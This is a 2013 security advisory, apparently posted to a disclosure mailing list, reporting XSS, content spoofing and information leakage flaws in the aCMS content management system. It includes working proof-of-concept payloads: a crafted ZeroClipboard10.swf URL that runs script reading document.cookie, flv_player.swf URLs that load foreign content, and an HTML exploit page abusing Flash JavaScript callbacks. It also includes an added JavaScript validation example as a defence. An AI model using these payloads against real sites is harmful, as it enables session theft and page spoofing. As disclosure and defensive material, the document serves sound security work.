Hello 3APA3A!
These are Cross-Site Scripting, Content Spoofing and Information Leakage vulnerabilities in aCMS. This is a commercial CMS. There are multiple vulnerabilities in aCMS, and this is the first part of them.
aCMS 1.0 and previous versions are vulnerable.
Almacor
http://almacor.ru
Cross-Site Scripting (WASC-08):
In ZeroClipboard10.swf, XSS via the id parameter and XSS via copying a payload into the clipboard are possible.
http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
Content Spoofing (WASC-12):
The swf file accepts arbitrary addresses in the parameters flvToPlay and startImage, which allows spoofing the content of the Flash movie, i.e. by setting addresses of video and/or image files from another site.
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml
The swf file accepts arbitrary addresses in the parameter flvToPlay, which allows spoofing the content of the Flash movie, i.e. by setting the address of a playlist file from another site (the parameters thumbnail and url in the xml file also accept arbitrary addresses).
File 1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>
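An added example, not code from the advisory or from aCMS, of how the parameters shown above could be validated before they reach the Flash embed: flvToPlay/startImage must resolve to the page's own origin and to an allowed media or playlist extension, and ZeroClipboard's id must be a plain identifier. The function names and the extension allow-list are assumptions.

```javascript
// Added example, not code from the advisory or from aCMS: allow-list
// validation for the swf parameters the advisory shows being abused.
// Function names and the extension allow-list are assumptions.

// Which file extensions each player parameter may point to (assumed policy).
const MEDIA_EXTENSIONS = {
  flvToPlay: ["flv", "xml"],                // video or playlist
  startImage: ["jpg", "jpeg", "png", "gif"] // poster image
};

// Resolve `value` against the page origin and accept it only if it stays
// same-origin and ends in an extension allowed for `param`; else null.
// Rejects absolute URLs to other hosts, protocol-relative "//host/..."
// and non-http(s) schemes, all of which would otherwise spoof the player.
function safeMediaUrl(param, value, pageOrigin) {
  const allowed = MEDIA_EXTENSIONS[param];
  if (!allowed || typeof value !== "string") return null;
  let u;
  try {
    u = new URL(value, pageOrigin); // WHATWG URL, global in browsers and Node
  } catch (e) {
    return null;
  }
  if (u.origin !== new URL(pageOrigin).origin) return null;
  const ext = u.pathname.split(".").pop().toLowerCase();
  return allowed.includes(ext) ? u.href : null;
}

// ZeroClipboard echoes `id` into a JavaScript string via ExternalInterface;
// the advisory's payload breaks out of that string. Allowing only a plain
// identifier makes the break-out impossible rather than trying to escape it.
function safeClipboardId(id) {
  return typeof id === "string" && /^[A-Za-z0-9_-]{1,64}$/.test(id) ? id : null;
}

// Build the query string for the player embed; any rejected parameter
// aborts the whole embed instead of falling back to a partial one.
function buildPlayerQuery(params, pageOrigin) {
  const parts = [];
  for (const [name, value] of Object.entries(params)) {
    const safe = safeMediaUrl(name, value, pageOrigin);
    if (safe === null) return null;
    parts.push(encodeURIComponent(name) + "=" + encodeURIComponent(safe));
  }
  return parts.join("&");
}
```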
Cross-Site Scripting (WASC-08):
If, on a page of the site that embeds flv_player.swf (with the parameter jsCallback=true, or where it is possible to set this parameter for flv_player.swf), it is possible to include JS code defining the functions flvStart() and/or flvEnd() (via HTML Injection), then an XSS attack can be conducted. I.e. the JS callbacks can be used for an XSS attack.
Example of exploit:
<html>
<body>
<script>
function flvStart() {
alert('XSS');
}
function flvEnd() {
alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>
Information Leakage (WASC-13):
On the 404 error page there are Source Code Disclosure, Full Path Disclosure, a listing of files and other information.
2013.03.04 - informed the developers about part of the vulnerabilities.
2013.04.03 - informed the developers about another part of the vulnerabilities.
2013.04.05 - announced at my site.
2013.04.07 - informed the developers about another part of the vulnerabilities.
2013.05.25 - informed the developers about another part of the vulnerabilities. In all cases the developers just ignored all messages sent via different e-mails and the contact form.
2013.05.25 - disclosed at my site (http://websecurity.com.ua/6423/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua